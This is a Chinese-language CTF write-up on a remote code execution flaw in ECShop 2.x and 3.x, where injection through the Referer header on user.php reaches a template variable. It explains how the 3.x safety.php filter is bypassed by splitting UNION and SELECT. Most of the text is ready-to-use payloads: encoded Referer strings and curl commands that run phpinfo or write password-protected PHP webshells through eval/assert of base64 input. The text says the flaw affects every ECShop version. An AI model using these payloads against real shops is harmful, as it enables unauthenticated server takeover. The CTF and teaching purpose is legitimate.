說是復現,其實來源於一道CTF題目(Ecshop3.x RCE)
1. 漏洞概述
ECShop的user.php文件中的display函數的模版變量可控,導致注入,配合注入可達到遠程代碼執行。攻擊者無需登錄站點等操作,可以直接遠程寫入webshell,危害嚴重。
2. 影響范圍
ECShop全系列版本,包括2.x,3.0.x,3.6.x等
3.開始做題
題目說是Ecshop,於是robots.txt
稍微看了下沒發現什么東西
遂,上nikto
仍然無事發生,遂百度搜索Ecshop漏洞
發現在user.php頁面的referer存在代碼注入
再看
繞過截斷
Payload構造
3.x略有不同
簡單講一下3.x版本吧。
在ECShop3.x版本中,添加了一個 includes/safety.php 文件,專門用於消除有害數據,它的正則會匹配到 set、 concat 、information_schema、 select from 等語句。暫時沒有找到可繞過的SQL語句,但是命令執行還是可以繞過的。因為我們之前的payload經過編碼,這樣就繞過了正則匹配。現在唯一能匹配到的就是 union select 語句,我們可以同時利用 $arr['id'] 和 $arr['num'] 兩個參數,將 union 和 select 分開傳遞即可繞過正則檢測。
2.x Payload:(phpinfo)
1)
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"' /*";}554fcae493e564ee0dc75bdf2ebf94ca
2)通過使用終端的curl命令(返回phpinfo)
Payload:
curl http://aa0c90a3c2924ea9b3b4fa97c11f687e.n1.vsgo.cloud:15819/user.php -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'
同理寫shell(vulnspy.php 密碼為 vulnspy)
Payload:
curl http://aa0c90a3c2924ea9b3b4fa97c11f687e.n1.vsgo.cloud:15819/user.php \
-d 'action=login&vulnspy=eval(base64_decode($_POST[d]));exit;&d=ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8%2BJyk7' \
-H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'
Webshell:(一句話1.php密碼1337)
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
測試中發現通過利用user.php發送請求添加Referer字段進行代碼注入時,webshell命名只能單個數字或者字母
3.X(測試3.x時發現curl方式有一定概率被過濾機制發現)
Payload:(phpinfo)
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Webshell:(一句話1.php密碼1337)
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:289:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
3.x getshell
參考文章:
https://www.vulnspy.com/cn-ecshop-3.x.x-rce-exploit/
https://www.vulnspy.com/cn-ecshop-2.7.x-rce-exploit/
https://xz.aliyun.com/t/2689